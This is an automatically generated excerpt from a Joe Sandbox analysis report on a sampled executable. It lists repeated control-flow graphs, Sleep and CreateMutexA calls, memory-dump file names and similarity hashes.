                                                                                                                                            control_flow_graph 182 49a1ae-49a1ce 186 49a1fc-49a218 182->186 187 49a1d0-49a1dc 182->187 190 49a21a-49a226 186->190 191 49a246-49a265 186->191 188 49a1de-49a1ec 187->188 189 49a1f2-49a1f9 call 4ad663 187->189 188->189 194 49a935 188->194 189->186 196 49a228-49a236 190->196 197 49a23c-49a243 call 4ad663 190->197 192 49a293-49a916 call 4a80c0 191->192 193 49a267-49a273 191->193 199 49a289-49a290 call 4ad663 193->199 200 49a275-49a283 193->200 203 49a953-49a994 Sleep CreateMutexA 194->203 204 49a935 call 4c6c6a 194->204 196->194 196->197 197->191 199->192 200->194 200->199 212 49a9a7-49a9a8 203->212 213 49a996-49a998 203->213 204->203 213->212 214 49a99a-49a9a5 213->214 214->212
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 036be92627d58a03dbe75003ec6b4190fd0f374cd2e82199ea124f1d585c7f07
                                                                                                                                            • Instruction ID: d79a09676b915f5611a14c52cb21292488142d4753eb4b1f6e1944212f8af7d2
                                                                                                                                            • Opcode Fuzzy Hash: 036be92627d58a03dbe75003ec6b4190fd0f374cd2e82199ea124f1d585c7f07
                                                                                                                                            • Instruction Fuzzy Hash: E9316A71A041409BFF08DB7CDD89B6DBF62EB86314F20462EE004973D5D77D9990879A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 216 49a418-49a438 220 49a43a-49a446 216->220 221 49a466-49a482 216->221 222 49a448-49a456 220->222 223 49a45c-49a463 call 4ad663 220->223 224 49a4b0-49a4cf 221->224 225 49a484-49a490 221->225 222->223 226 49a93f-49a949 call 4c6c6a * 2 222->226 223->221 230 49a4fd-49a916 call 4a80c0 224->230 231 49a4d1-49a4dd 224->231 228 49a492-49a4a0 225->228 229 49a4a6-49a4ad call 4ad663 225->229 247 49a94e-49a994 call 4c6c6a Sleep CreateMutexA 226->247 248 49a949 call 4c6c6a 226->248 228->226 228->229 229->224 232 49a4df-49a4ed 231->232 233 49a4f3-49a4fa call 4ad663 231->233 232->226 232->233 233->230 252 49a9a7-49a9a8 247->252 253 49a996-49a998 247->253 248->247 253->252 254 49a99a-49a9a5 253->254 254->252
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 5d87a42fadee8fc46a18941f4b4037e2e4a54dbcf55259d954fab05bed6d27c0
                                                                                                                                            • Instruction ID: a1aed651764789f82b82589d5aa499ed104ca14e9cc4b68beddc8015cb217b5a
                                                                                                                                            • Opcode Fuzzy Hash: 5d87a42fadee8fc46a18941f4b4037e2e4a54dbcf55259d954fab05bed6d27c0
                                                                                                                                            • Instruction Fuzzy Hash: 51316C71A041009BEF08DB7CCD89B6DBB61EF82318F20862EE014973D5DB7D9990869E

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 256 49a54d-49a56d 260 49a59b-49a5b7 256->260 261 49a56f-49a57b 256->261 264 49a5b9-49a5c5 260->264 265 49a5e5-49a604 260->265 262 49a57d-49a58b 261->262 263 49a591-49a598 call 4ad663 261->263 262->263 268 49a944-49a949 call 4c6c6a 262->268 263->260 270 49a5db-49a5e2 call 4ad663 264->270 271 49a5c7-49a5d5 264->271 266 49a632-49a916 call 4a80c0 265->266 267 49a606-49a612 265->267 273 49a628-49a62f call 4ad663 267->273 274 49a614-49a622 267->274 284 49a94e-49a994 call 4c6c6a Sleep CreateMutexA 268->284 285 49a949 call 4c6c6a 268->285 270->265 271->268 271->270 273->266 274->268 274->273 290 49a9a7-49a9a8 284->290 291 49a996-49a998 284->291 285->284 291->290 292 49a99a-49a9a5 291->292 292->290
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695657164.00000000007A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695672860.00000000007B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695687359.00000000007B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_490000_file.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID: T2O
                                                                                                                                            • API String ID: 1464230837-2682738446
                                                                                                                                            • Opcode ID: 9674cdb72f6bda0c5f6119aee427331a5344a9665e560ff98df4d53fde4e9966
                                                                                                                                            • Instruction ID: 0272c1557c2aed02d869b998c44cea30133011eec345522cf8b083aacb15b333
                                                                                                                                            • Opcode Fuzzy Hash: 9674cdb72f6bda0c5f6119aee427331a5344a9665e560ff98df4d53fde4e9966
                                                                                                                                            • Instruction Fuzzy Hash: 52313971B041009BEF08DB78CD89B6DBB61EB82328F24862EE044973D5CB7D9990865A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 294 49a682-49a6a2 298 49a6d0-49a6ec 294->298 299 49a6a4-49a6b0 294->299 302 49a71a-49a739 298->302 303 49a6ee-49a6fa 298->303 300 49a6b2-49a6c0 299->300 301 49a6c6-49a6cd call 4ad663 299->301 300->301 304 49a949 300->304 301->298 308 49a73b-49a747 302->308 309 49a767-49a916 call 4a80c0 302->309 306 49a6fc-49a70a 303->306 307 49a710-49a717 call 4ad663 303->307 314 49a94e-49a994 call 4c6c6a Sleep CreateMutexA 304->314 315 49a949 call 4c6c6a 304->315 306->304 306->307 307->302 310 49a749-49a757 308->310 311 49a75d-49a764 call 4ad663 308->311 310->304 310->311 311->309 326 49a9a7-49a9a8 314->326 327 49a996-49a998 314->327 315->314 327->326 328 49a99a-49a9a5 327->328 328->326
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0049A963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,004F3254), ref: 0049A981
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1693562113.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1693695905.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694324251.00000000004F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694367536.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694411712.0000000000505000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694428980.0000000000506000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694445434.0000000000507000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1694654030.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695074453.000000000066B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.0000000000680000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695092498.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695124931.0000000000693000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695139408.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695153961.0000000000696000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695168343.0000000000697000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695200717.0000000000698000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695213601.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695232057.00000000006B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695247078.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695262924.00000000006C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695281765.00000000006D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695300594.00000000006EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695315547.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695329478.00000000006F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695343794.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695359304.00000000006FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695373645.0000000000704000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695388666.0000000000705000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695402775.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695421233.000000000071F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695436344.0000000000723000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695449969.0000000000724000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695465729.0000000000727000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695479810.0000000000728000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695494583.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695511240.0000000000741000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695526129.0000000000742000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695542046.000000000074D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695556203.000000000076B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695597549.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695612933.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695627779.000000000079F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1695642712.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
